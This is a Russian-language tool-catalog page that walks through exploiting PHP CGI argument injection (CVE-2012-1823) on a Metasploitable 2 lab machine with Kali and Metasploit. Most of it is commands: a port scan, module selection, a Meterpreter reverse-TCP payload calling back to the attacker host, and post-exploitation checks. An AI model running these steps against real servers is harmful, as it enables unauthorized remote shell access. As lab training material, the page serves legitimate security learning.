Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PHP-CGI-Argument-Injection-Exploit — В этом видео демонстрируется эксплуатация уязвимости PHP CGI Argument Injection (CVE-2012-1823) на сервере Metasploitable 2 с помощью Kali Linux и Metasploit. | Kitploit
Инструменты/GitHubGitHub/nulltrace1336/php-cgi-argument-injection-exploit
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubnulltrace1336/php-cgi-argument-injection-exploit

PHP-CGI-Argument-Injection-Exploit

В этом видео демонстрируется эксплуатация уязвимости PHP CGI Argument Injection (CVE-2012-1823) на сервере Metasploitable 2 с помощью Kali Linux и Metasploit.

Репозиторий
109 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🎬 Этот видеоролик YouTube

YouTube Video

1️⃣ Проверка цели

Определите IP Metasploitable с Kali:

ip a

Например:

Kali: 192.168.56.101

Metasploitable2: 192.168.56.102

Проверяем порт и сервис:

nmap -p 80 192.168.56.102

Также можно проверить в браузере:

http://192.168.56.102/

2️⃣ Запуск Metasploit

msfconsole

3️⃣ Выбор модуля эксплойта PHP CGI

search php cgi

Правильный модуль:

use exploit/multi/http/php_cgi_arg_injection

4️⃣ Настройка эксплойта

set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /

Выбираем полезную нагрузку (payload):

set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444

Проверяем:

show options

5️⃣ Запуск эксплойта

run

или

exploit

Если всё прошло успешно:

Meterpreter session 1 opened

6️⃣ Проверка доступа

sysinfo
whoami
Скачать инструмент